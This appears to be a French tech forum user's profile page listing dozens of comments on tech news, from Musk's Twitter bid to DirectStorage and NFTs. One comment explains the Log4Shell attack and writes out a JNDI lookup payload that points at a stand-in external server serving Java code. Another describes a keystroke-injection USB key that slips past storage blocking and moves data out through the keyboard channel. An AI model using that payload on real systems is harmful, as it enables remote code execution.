votre avatar Abonné

KooKiz

est avec nous depuis le 5 avril 2005 ❤️

254 commentaires

Le 22/08/2022 à 16h 02

Quoique il y a un deuxième avantage, comme souligné par la news : vu que la clé s’identifie comme un clavier, elle n’est pas bloquée par la plupart des protections mises en place dans les entreprises (dans la plupart des banques, les périphériques de stockage USB sont automatiquement bloqués).



Le site explique que la clé utilise le canal de communication de l’interface clavier au départ prévu pour la lumière des touches num lock/caps lock. En utilisant, ça, des données peuvent être écrites sur la clé sans être visibles par l’antivirus ou le firewall.

Le 22/08/2022 à 15h 53


BlackLightning a dit:


Corrigez-moi si je me trompe, mais la clé usb n’est juste là pour lancer une série d’exploit massive comme si un pirate était connecté en physique à la machine , non ?


Oui. Elle ne permet rien de plus que ce qu’on pourrait faire en ayant accès au clavier de la machine. L’intérêt c’est la rapidité et ne pas avoir à manipuler le clavier (= possibilité de brancher la clé pendant quelques secondes et de la débrancher sans avoir l’air suspect).

Le 13/07/2022 à 12h 10

Dire qu’à l’origine de Tesla et SpaceX j’admirais cet homme, il est vraiment parti en sucette. Je ne sais pas si le succès lui est monté à la tête ou s’il a toujours été comme ça et a simplement gagné en visibilité…

Le 23/06/2022 à 11h 19


Les consultants chargés de transformer l’administration sont aussi épinglés pour leurs méthodes dites « disruptives », à coup de « post-it, gommettes, serious games, etc. ». Des pratiques « souvent mal vécues par les fonctionnaires ».


Mais… :transpi:

Le 10/06/2022 à 11h 32


Thorgalix_21 a dit:


Petite astuce pour avoir une valeur de Pi assez précise sur un appareil qui ne l’a pas spécifiquement : utiliser la division 355113 qui est beaucoup plus précise que 227.


Je ne suis pas absolument sûr que 355113 soit plus facile à retenir que 3.1415927, mais peut être que c’est juste moi :transpi:

Le 09/06/2022 à 12h 00


Pour mieux gérer les ressources, le rapport propose de « rassembler les quatre entreprises nationales de l’audiovisuel public dans une même structure ». Elle regrouperait France Télévisions, Radio France, France Médias Monde et l’INA . « Une société unique doit permettre une unité de pilotage, une réduction des niveaux hiérarchiques et donc une plus grande agilité pour répondre aux défis qui s’annoncent ».


En général quand on veut apporter plus d’agilité on divise la grosse structure en plusieurs petites, on les réunit pas en une seule méga-structure… :fou:

Le 07/06/2022 à 11h 05


l’iPad pouvant ainsi afficher des fenêtres qui se chevauchent


L’informatique est un éternel recommencement :transpi:

Le 21/05/2022 à 08h 43


OlivierJ a dit:


Même pas sûr. Ça me fait toujours marrer les commentaires genre “ils n’y ont pas pensé” (il y a aussi le commentaire 8 qui y ressemble).



Sérieusement les mecs, vous imaginez penser en quelques minutes à des sujets qui occupent des scientifiques à plein temps pendant des années ?


C’est justement ce qui rend la question interessante. Si on me demande “comment enlever la poussière de la sonde”, je vais répondre “tout simplement avec un balai mécanique”. Que ça n’a pas été fait démontre ma méconnaissance total du sujet, et du coup je suis vraiment curieux d’apprendre pourquoi le problème n’est pas aussi simple qu’il n’y parait.



Après je comprends tout à fait qu’on ait pu prendre mon commentaire au premier degré, je partage cet agacement quand je lis des réponses qui pensent sincèrement mieux connaître le sujet que les ingénieurs qui ont planché dessus durant des années. J’espérais que le smiley suffirait mais l’intention est souvent ambigüe quand on écrit un commentaire :chinois:

Le 20/05/2022 à 10h 46

Je me posais la même question. Ce n’est pas possible de mettre des essuie-glace sur les panneaux solaires ? :transpi:

Le 16/05/2022 à 08h 13

Juste pour illustrer mes propos : https://imgur.com/a/iEGfvgj



Sur la partie gauche, on peut voir que Twitter (en bleu) est fortement correlé au cours du NASDAQ (en orange). Au moment de l’annonce, on perd cette corrélation et Twitter monte fortement alors que le NASDAQ baisse. Ce qu’on voit en ce moment c’est juste l’effet d’annonce disparaitre : avec la baisse de confiance, l’offre d’Elon ne suffit plus à protéger le cours, qui rejoue en quelque jours la baisse qu’il aurait connu en quelques semaines.



Après, je ne dis pas qu’Elon ne va pas faire plonger le cours encore plus bas. Mais il est trop tôt pour pouvoir conclure que sa stratégie consistait à faire baisser le cours au delà de sa valeur initiale.

Le 16/05/2022 à 08h 02


anagrys a dit:


Question : dans la mesure où Musk a proposé un prix fixe par action, et que le conseil d’administration a accepté l’opération à ce prix, est-ce que ces yoyos peuvent avoir un effet sur le prix qu’il va payer in fine ? Parce-que si oui, les autorités ne vont effectivement pas apprécier, il faudrait vérifier si ça ne relève pas de la manipulation des cours. Et si non… OSEF, non ?


Non. S’il fait une offre à 54 € par action et que celle-ci est validée, il paiera 54 € par action, peu importe que le dernier cours valait 50, 20, ou 200 €. Si l’action s’est stabilisée à 54 € juste après l’annonce initiale c’est justement parce que c’est un prix garanti (si l’achat est effectif) donc quiconque achète une action à moins de 54 € est garanti de faire un profit.



Après, il y a toujours possibilité pour Elon d’utiliser la baisse comme prétexte pour émettre une nouvelle offre, plus basse. Mais à ce moment là on entre dans une nouvelle phase de négociation et le conseil d’administration n’est absolument pas forcé d’accepter. D’autant plus si c’est justement les déclarations d’Elon qui ont fait baissé le cours.
(Bon en pratique c’est tout le NASDAQ qui se casse la gueule, donc le prix de l’action reflète que les actionnaires n’ont plus suffisamment confiance dans la possibilité de rachat pour garder l’action dans leur portefeuille alors qu’elle pourrait se vendre à un prix artificiellement haut. Twitter ne baisse pas à cause des déclarations d’Elon, c’est plutôt que le cours rattrape la baisse qu’il aurait connu si Elon n’avait pas fait son annonce de rachat)

Le 10/05/2022 à 10h 25

Question con, on est sûr que c’est un rendu 3D et pas une vraie vidéo ? Parce que perso je suis totalement incapable de dire (ce qui en dit long sur la prouesse technique/artistique)

Le 09/05/2022 à 11h 03

Je ne sais pas si le tirage au sort a déjà eu lieu, je tente ma chance :francais:

Le 02/05/2022 à 10h 54


Patch a dit:


Donc ce mec est en parfait accord avec une apologie de la haine quasi-assumée, et une propagation permanente de fakenews qui peuvent mettre en danger la vie de milliers (voire plus) de personnes?


Je suis 100% en faveur du bloquage de Trump, mais la position de Musk est un peu plus subtile que ça : il estime que les plateformes privées ne devraient pas pouvoir censurer au delà de ce qui est permis/prévu par la loi, et dans le fond je suis d’accord avec ça.
Le coeur du problème c’est que diffuser de la désinformation comme l’a fait Trump devrait être illégal. Les plateformes privées ne devraient pas pouvoir prendre ce genre de décision car ça pose un problème de neutralité.



Mais c’est une position qui, à mon avis, manque de pragmatisme. C’était évident que le gouvernement n’allait pas agir contre Trump, donc je salue la décision de Twitter pour cette fois là.

Le 25/03/2022 à 13h 14


EtenN a dit:


Un jour j’aimerais que le fameux préjudice soit scientifiquement démontré :



Car soit c’est un préjudice économique et dans ce cas le préjudice n’a jamais été réellement démontré sur des bases scientifiques solide.


Le préjudice économique était évident à l’époque où la RCP a été introduite : l’époque des magnestoscopes et cassettes audio, où on enregistrait ce qui passait à la télé/radio plutôt que d’acheter les oeuvres directement sur leur support. Dans mon foyer par exemple, on avait un paquet de cassettes vidéos enregistrées par le magnetoscope, et 3-4 cassettes maximum achetées en commerce.



Le souci c’est que la RCP ne cesse d’augmenter alors même que les usages ont changé et qu’elle n’a plus aucun sens. Je sais que je ne ne suis pas représentatif, mais je ne regarde pas la télévision, je n’écoute pas la radio, et je consomme ma musique/vidéo en streaming (deezer/netflix). Je n’ai pas la moindre copie légale.

Le 16/03/2022 à 11h 43


obor2 a dit:


Quelqu’un dans la sécurité informatique a une opinion sur le sujet ? Car personnellement, je vois cette techno comme une porte d’entrée à des contenus malicieux. Quel est le niveau de privilèges accordé à ces routines ? Y-a-t-il des mesures de coercition ou de protection ? Bref, est-ce bien pensé pour (tenter d’) éviter toute malversation par ce biais ?


C’est difficile de trouver des informations détaillées là dessus, mais si je cite l’annonce par Microsoft:




NVMe devices are not only extremely high bandwidth SSD based devices, but they also have hardware data access pipes called NVMe queues which are particularly suited to gaming workloads. To get data off the drive, an OS submits a request to the drive and data is delivered to the app via these queues.


Donc à priori la requête transite toujours par l’OS, qui vérifie certainement les droits d’accès au fichier. Je ne pense pas qu’il y ait de souci de sécurité.



Les bénéfices sont, j’ai l’impression :




  • Du batching. Au lieu de faire une requête par bloc de données, l’application peut juste demander “j’ai besoin de tout ça” en un seul appel et l’OS s’occupe de gérer tout ça (les appels systèmes sont coûteux)

  • Ce n’est pas mentionné explicitement, mais je suppose qu’il y a une forme de DMA (direct memory access) où le SSD doit pouvoir pousser l’information directement dans la mémoire du GPU sans transiter par la RAM

Le 17/02/2022 à 11h 56

Perso j’attends toujours qu’ils remettent la possibilité de mettre la taskbar sur le côté. Prochaine fournée d’updates peut être ? En attendant je reste sur Windows 10.

Le 15/02/2022 à 12h 43

On est bien d’accord. Je pense que c’est un phénomène qui s’auto-entretient. IBM a une main d’oeuvre vieillissante, du coup elle a cette image “has been” qui n’attire pas les jeunes, et du coup elle a une main d’oeuvre vieillissante…

Le 14/02/2022 à 12h 04

Je ne pense pas que ce soit possible. Si j’ai bien compris le fonctionnement, la société de démarchage fournit sa liste de numéros à bloctel, et bloctel en retire les numéros blacklistés. On peut donc déduire quels sont les numéros bloqués, mais pas s’en servir pour construire une liste à partir de rien.

Le 25/01/2022 à 11h 52

Et si on arrêtait d’avantager artificiellement les salles de cinema, et qu’on laissait à ceux qui préfèrent le confort de leur salon la possibilité de regarder ces films à la demande sans délai ? Non ? Trop tôt ?

Le 21/01/2022 à 12h 49


(quote:1925626:skankhunt42 )
Ce qui est important c’est que le créateur sois au moins rémunéré une fois. Après si quelqu’un utilise l’image sans payer ça fera pas de manque à gagner et au mieux de la publicité si des gens viennent chez lui et donc des ventes potentielles.


Il n’y a vraiment pas besoin de NFTs pour ça. J’ai déjà commissionné des artistes à multiples reprises
pour des projets persos, et ils ont bien été payés. On en revient toujours au fait que ce système apporte une mauvaise solution à un problème qui n’existe pas de base.

Le 17/01/2022 à 12h 00

Il n’y a pas de souci, pour la bonne et simple raison que des photos aériennes à haute altitude ne constituent pas légalement une atteinte à la vie privée. https://www.senat.fr/questions/base/1988/qSEQ880600345.html

Le 11/01/2022 à 11h 54


Nozalys a dit:


J’ai d’ailleurs l’impression, avec mes cartouches compatibles actuelle, que le “niveau” indiqué par l’imprimante des cartouches de couleur baisse malgré une utilisation exclusive du noir & blanc… Je ne serais pas surpris que le logiciel d’Epson incrémente tous les compteurs sur les cartouches non-Epson. En tout cas je ne vois pas d’autre explication, et c’est bien dans leur façon de faire.


Pour info, si tu ne vas pas dans les options d’impression et que tu sélectionnes “noir et blanc”, l’imprimante va utiliser les cartouches d’encre couleur même si elle a une cartouche dédiée pour le noir.



Toujours plus loin dans l’arnaque.

Le 07/01/2022 à 12h 34


sergekaramazov a dit:


non contents de consommer probablement bien plus d’énergie en tant que système global d’échange de valeur


Il n’y a aucune raison pour laquelle n’importe quel système consommerait plus que bitcoin (ou autre blockchain basée sur du proof of work) à capacité/fonctionnalité égale. Le principe du PoW est littéralement de consommer de l’énergie pour prouver que tu peux en consommer. Le système tout entier est basé sur son inefficacité.

Le 03/01/2022 à 13h 12


fred42 a dit:


Pourquoi malheureusement ? En 64 bits, il n’y aura pas de problème avant très très longtemps et en 2038, les machines 32 bits, il ne devrait plus y en avoir beaucoup. :D


Je voulais dire “des timestamps unix 32 bits” bien entendu :chinois:

Le 03/01/2022 à 12h 04


(reply:1920525:Trit’)


Il n’y a malheureusement pas que les systèmes UNIX qui utilisent des timestamps UNIX…

Le 03/01/2022 à 11h 57


dylem29 a dit:


Quelqu’un peut m’expliquer le rapport avec les VPN et le streaming illégal ?


Si je comprends bien, c’est parce que ça permet de contourner les blocages :




C’est pourquoi le rapporteur rappelle ici toute l’importance de la mise en œuvre du dispositif juridique d’ordonnance dynamique de blocage et de déréférencement
[..]
le « Virtual Private Network » (VPN) qui, par ses fonctions, permet entre autres à son utilisateur de devenir anonyme lors de ses navigations sur internet ou encore de lever les restrictions géographiques de certains sites, permet une forme de détournement de ce dispositif”


Mais bon, vu qu’on ne fait que du blocage DNS en France, y’a pas vraiment besoin d’un VPN pour contourner…



On notera qu’ils s’inquiètent aussi… de la blockchain :transpi:




“Toutefois, comme l’audition de la Hadopi a pu le mettre en valeur, des points de vigilance quant à l’effectivité et l’opérationnalité de ce dispositif seront à étudier à l’avenir au regard du déploiement de technologies actuelles que sont le VPN et la Blockchain.



En effet, un système qui ne passerait que par des utilisateurs, c’est-à-dire un système de pair à pair sans serveurs centraux (blockchain), pourrait échapper au dispositif.”


Le 28/12/2021 à 11h 04

A moins d’une révolution technologique, la limitation de l’ADN (et de tout stockage moléculaire) restera la vitesse, ce qui limite à des usages de stockage très longue durée. L’article cite 500 ko/s, mais je ne pense pas qu’il faut prendre ça au sens instantanné, à mon avis c’est plutôt une quantité de données stockée après un processus de plusieurs minutes (heures ?) qui équivaut à une vitesse moyenne de 500 ko/s.

Le 13/12/2021 à 09h 35

L’idée est d’envoyer une requête de sorte que l’application cible log la chaine “${jndi:ldap://serveur_externe}” (c’est souvent très facile, il est probable qu’une application web va logger les urls des erreurs 404 par exemple). A partir de là, il suffit de mettre en place un serveur à l’adresse “serveur_externe” qui retourne un .class Java (je n’ai pas regardé par quelle protocole), et l’application cible va automatiquement l’exécuter.



Donc pas besoin d’avoir un ldap sur le réseau cible.

Le 13/12/2021 à 09h 28

Sauf erreur de ma part, la présentation de 2016 montre qu’il est possible d’exécuter du code à distance via jndi + ldap, mais pas que log4j est un vecteur d’attaque.

Le 10/12/2021 à 11h 57


(reply:1917480:Frédérick L.)


Argh oui, my bad

Le 10/12/2021 à 10h 36

Je sais que ce n’est ni la même époque ni les mêmes développeurs, mais Matrix Reloaded m’a tellement marqué que je ne pense plus pouvoir retoucher à un jeu Matrix :transpi:

Le 09/12/2021 à 11h 37

Je crois que l’intérêt c’est de pouvoir l’échanger/vendre sans passer par la plateforme d’ubisoft. Par exemple si je veux te vendre un item sur un jeu, il faut forcément que ce soit supporté par l’éditeur (qui fournisse un marketplace ou autre), sinon comment est-ce que je peux te transmettre la propriété de l’item ?



On peut imaginer un système où je me log sur mon compte et je te transmets manuellement l’item, mais il y a des arnaques possibles, par exemple un vendeur qui refuse de transmettre l’item alors qu’il a reçu l’argent. Tezos supporte les smart contracts, donc je peux t’échanger la propriété de l’item contre une somme d’argent de manière transactionelle.



Honnêtement, c’est la première fois que je vois un usage des NFT qui répond à une problématique. Même si au final ça va juste encourager la spéculation autour des collectibles d’un jeu vidéo, ce qui est clairement une mauvaise chose.

Le 25/11/2021 à 11h 03

Les supermarchés sont déjà truffés de cameras. C’est probablement meilleur pour la vie privée d’avoir un algorithme qui traque tes mouvements plutôt qu’un vigile qui te regarde faire.

Le 24/11/2021 à 09h 37

S’il suffisait que l’ADN soit “dans la nature” pour qu’on l’assimile, ça ferait longtemps qu’on se serait transformé en plante :D



Il y a un grand nombre de protections dans l’organisme pour éviter que ça se produise, justement parce qu’on y est exposé au quotidien.

Le 02/11/2021 à 13h 27

Le lino c’est mieux github.com GitHub



Il y a de quoi en faire tout un article des éditeurs de texte pour terminal.



Et merci pour l’article.

Sympathique, merci pour la suggestion ! Je vais l’essayer pendant quelques jours, vu que j’utilise principalement Windows je le trouve plus naturel que Nano.

Le 13/10/2021 à 10h 47

Aujourd’hui Windows n’a pas d’équivalent à io_uring, mais ça arrive : https://windows-internals.com/i-o-rings-when-one-i-o-operation-is-not-enough/

Le 12/10/2021 à 08h 12

C’est pas pour être pédant, mais est-ce bien nécessaire de préciser “chercheur de failles zero day” ? Ca laisse penser qu’il y a des chercheurs qui se concentrent sur chercher des failles qui ont déjà été découvertes :transpi:

Le 24/09/2021 à 10h 44

Dans mon quartier ils ont pris la peine il y a quelques semaines de tout débrancher et recabler proprement, je suis curieux de voir combien de temps ça va tenir enfin que ce soit à nouveau le bazar…

Le 16/09/2021 à 07h 40

:8

Le 14/09/2021 à 08h 14


Pire, elle contournerait certains mécanismes de protection.


Si Firefox peut le faire sans avoir les droits administrateur, c’est que ce n’est pas un mécanisme de protection…

Le 07/09/2021 à 17h 29

Tous les pays font pression les uns sur les autres. L’Europe ça fonctionne à coup de “je vote pour ton project xxx mais en échange tu votes pour mon projet yyy”. Je n’ai pas le moindre doute que c’est un accord similaire qui a été passé ici.

Le 06/09/2021 à 12h 55

Pour un tag de prix (ou autres étiquettes du même type) c’est probablement le cas d’utilisation ultime. Je pense que l’étiquette n’a même pas besoin d’avoir une batterie, juste une bobine, et le terminal chargé de mettre à jour les prix peut alimenter l’étiquette sans contact le temps de mettre à jour l’affichage de l’écran.

Le 06/09/2021 à 11h 17


ecatomb a dit:


Mais je ne vois pas beaucoup de cas où le contenu à l’écran est longtemps identique. En dehors de la lecture d’un livre (plusieurs minutes à avoir la même page)


Je dirais qu’il y en a pas mal (heure, température, …) mais l’intérêt n’est pas évident face à un écran LCD non rétro-éclairé qui consomme déjà très peu.

Le 06/09/2021 à 07h 40

:8

Le 15/07/2021 à 08h 51

Je préparais une réponse dans ma tête pour je-ne-sais-plus-qui qui déclarait dans ces commentaires que le vaccin nous transformait en OGM, puis j’ai réalisé quelque chose.



Je comprends que le vaccin transporte de l’ARN messager dans un lipide, qui est assimilé par la cellule et qui va alors produire les protéines codées par le brin d’ARNm. Il n’existe aucun mécanisme dans la cellule ou dans le vaccin permettant à l’ARNm d’être recopié dans l’ADN.



Par contre, ce “mécanisme” existe à l’état naturel : les retrovirus. Du coup je me pose la question : dans le cas d’une vaccination d’un sujet préalablement infecté par un retrovirus, ne serait-il pas théoriquement possible que l’ARNm du vaccin se retrouve assimilé dans une cellule qui dispose déjà de la reverse-transcriptase apportée par le retro-virus, et que du coup cet ARNm se retrouve integré au génome de cette cellule ?



Je ne dis pas que ça serait un problème, je me demande juste si ma compréhension des phénomènes impliqués est correcte.

Le 17/06/2021 à 11h 01


inextenza a dit:


On lui doit surtout le rôle de cheval de Troie: c’est lui qui a affaiblit Nokia pour rendre la marque achetable par son ancien employeur Microsoft (vous vous souvenez, les Windows Phones? Ben c’étaient des Nokia en fait, débarrassé de l’antique Symbian, et hélas également débarrassé du meilleur OS mobile que j’ai connu, Maemo/Meego qu’il a tout fait pour couler, à l’encontre total du marché car quand les WinPhones et Meego ont un temps cohabité, les ventes étaient entre le double et le triple pour l’OS Linux; et d’aspects techniques) … et ainsi revenir en bonne position au board.



Aujourd’hui, clairement, si Nokia n’est plus qu’une petite marque chinoise, c’est son œuvre.



Ce mec me fait penser à Franck Underwood dans le monde informatique/telecom. Et ce n’est pas, mais alors pas du tout un compliment, sinon qu’il est un stratège incroyable pour avoir su piéger des entités aussi énormes.


Tu ne confondrais pas avec Stephen Elop ?




Witcher a dit:


On lui doit le retour du menu Démarrer, personne ne regrette Steve Ballmer.


C’est une décision qui se prend à un échelon inférieur. Le départ du menu démarrer c’est Steven Sinofsky, pas Steve Ballmer.

Le 15/06/2021 à 11h 29


jpaul a dit:


Si ce matériau tient toutes ses promesses, on tient peut être un tournant industriel et technologique comparable à l’arrivée de la machine à vapeur ou du moteur thermique.


Ou du laser, plus recemment.

Le 08/06/2021 à 11h 46

Un peu surpris de ne toujours pas voir Go dans la liste des langages supportés.

Le 03/06/2021 à 11h 26


lebreiz a dit:


Tiens ce serait peut être possible d’avoir le circuit NFC ouvert avec deux petits connecteurs métalliques apparent sur la carte ? dans ta poche c’est coupé mais quand tu payes, tu laisses le pouce sur les contacts pour fermer le circuit ! Après ça risque de foutre la merde avec les boitier métalliques… :D


C’est une idée interessante mais je ne sais pas si c’est si simple. Je suppose que la résistance du doigt doit être trop élevée par rapport au faible courant induit dans l’antenne. On peut imaginer un bouton pressoir (suffisamment fin pour que la carte rentre toujours dans son étui), mais un étui trop serré risquerait d’appuyer dessus. J’adorerais avoir l’avis de quelqu’un plus calé dans le domaine que moi.